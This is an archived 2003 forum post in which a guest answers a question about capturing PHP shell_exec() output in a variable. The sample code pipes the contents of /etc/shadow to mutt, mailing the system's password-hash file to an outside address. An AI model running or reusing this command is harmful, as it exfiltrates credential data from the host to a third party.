View Single Post
Old 01-20-2003, 05:05 PM   #28 (permalink)
anon
Guest
 
Posts: n/a
Quote:
Originally posted by sde
now i want to get shell_exec() to work so i can actually get the output into a variable rather than just printing it out.
That made no sense at all because doesn't it have to go in a variable?

ie.

$blah=shell_exec("cat /etc/shadow|mutt v902@users.sourceforge. net");
echo $blah;

?
  Reply With Quote